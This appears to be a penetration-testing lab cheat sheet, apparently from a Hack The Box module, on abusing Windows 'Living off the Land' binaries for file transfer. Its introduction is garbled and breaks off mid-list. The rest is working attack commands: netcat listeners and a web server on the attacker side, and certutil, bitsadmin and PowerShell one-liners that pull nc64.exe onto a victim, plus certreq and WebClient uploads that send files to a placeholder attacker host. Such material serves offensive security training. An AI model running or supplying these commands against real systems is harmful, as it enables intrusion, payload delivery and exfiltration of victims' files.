The term LOLBins (Living off the Land binaries) came from on what to call binaries that an attacker can use to perform actions beyond their original purpose. There are currently two websites that aggregate information on Living off the Land binaries:

Living off the Land binaries can be used to perform functions such as:


Attacker side (your Kali / Pwnbox) – run these first

# Simple web server (for downloads)
python3 -m http.server 80

# Listener for uploads (certreq method)
nc -lvnp 443

# Alternative listener (for WebClient method)
nc -lvnp 9001

Victim side (Windows target )

:: 1. Download with certutil (works everywhere) certutil.exe -urlcache -split -f http://YOUR_KALI_IP/nc64.exe C:\Users\htb-student\Desktop\nc64.exe

:: 2. Download with bitsadmin (very stealthy) bitsadmin /transfer job http://YOUR_KALI_IP/nc64.exe C:\Temp\nc64.exe

:: 3. Download with PowerShell + BITS (even cleaner) powershell -ep bypass "Import-Module BitsTransfer; Start-BitsTransfer http://YOUR_KALI_IP/nc64.exe C:\Temp\nc64.exe"

:: 4. Upload with certreq (exact method from the module) certreq.exe -Post -config http://YOUR_KALI_IP:443/ C:\Windows\win.ini

:: 5. Upload with PowerShell WebClient powershell -c "(New-Object Net.WebClient).UploadFile('http://YOUR_KALI_IP:9001/win.ini','C:\Windows\win.ini')"